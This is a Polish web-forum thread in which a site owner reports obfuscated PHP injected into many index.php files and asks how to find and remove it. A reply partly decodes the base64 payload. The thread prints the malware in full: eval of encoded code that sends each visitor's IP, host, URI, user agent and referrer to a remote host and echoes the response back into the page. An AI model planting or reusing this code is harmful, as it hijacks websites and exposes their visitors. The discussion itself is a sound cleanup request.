[PHP]wyszukiwanie określonego kodu w wielu plikach php, jak i czym? Opcje

[kamil9012]

Witam.
Dzisiaj moje strony chyba zaatakował wirus. Dodawał tylko do plików index.php taki kod PHP:

[PHP] pobierz, plaintext 
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIz
NDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpO
yRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[PHP] pobierz, plaintext 

Niestety na moim serwerze jest kilkaset plików o nazwie index.php żebym mógł ręcznie w nich szukać powyższego kodu i go usuwać.

Czy macie może pomysł w jaki sposób lub jakim programem mógłbym przeszukać pliki php w poszukiwaniu powyżeszgo kodu lub jego usunięcie?

Jeżeli ktoś z Was spotkał się z podobnym problemem to proszę o info jak temu zapobiegać.

Z góry dzięki i oczywiście plusik dla pomagających.

Ten post edytował kamil9012 13.10.2011, 20:43:45

[kamil9012]

Wirus raczej nie jest satysfakcjonującą odpowiedzią. Ponieważ jakoś się tam musiał dostać, jeśli wirus - to nie wierzę że po zainfekowaniu na Twoim komputerze, wgrywałeś te wszystkie pliki na swój serwer.
Serwery w większości są na linuksach co raczej dowodzi że ktoś kto to pisał/wdrożył, próbował dostać się do Twojego hostingu, co z resztą całkiem sprawnie mu się udało.
Pytanie - co jeszcze udało mu się zdobyć? Zrzuty baz danych ?

Edit: Fragment kodu który dostałeś `w prezencie` pod base64:

[PHP] pobierz, plaintext 
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?> $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
[PHP] pobierz, plaintext 

Dzisiaj poproszę hostingodawcę o przeskanowanie serwera i zmienię hasła do ftp i mysql. Nie wiem na ile to pomoże, ale mam nadzieję, że będzie skuteczne.

Ten kod:

[PHP] pobierz, plaintext 
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?> $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
[PHP] pobierz, plaintext 

wziąłeś sobie z tego kodu?

[PHP] pobierz, plaintext 
    <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIz
    NDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1Ip
O
    yRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[PHP] pobierz, plaintext 

Czy możę to kolejny fragment, który muszę szukać i usuwać?


ps. właśnie jeżeli ktoś się zna to mógłby napisać co hakerowi mogło się udać osiągnąć? Nie bardzo rozumiem żeby mógł on sobie wysyłać moje bazy do http://96.69e.a6e.o0/bt.php, czy w ogóle taki IP 96.69e.a6e.o0 może istnieć?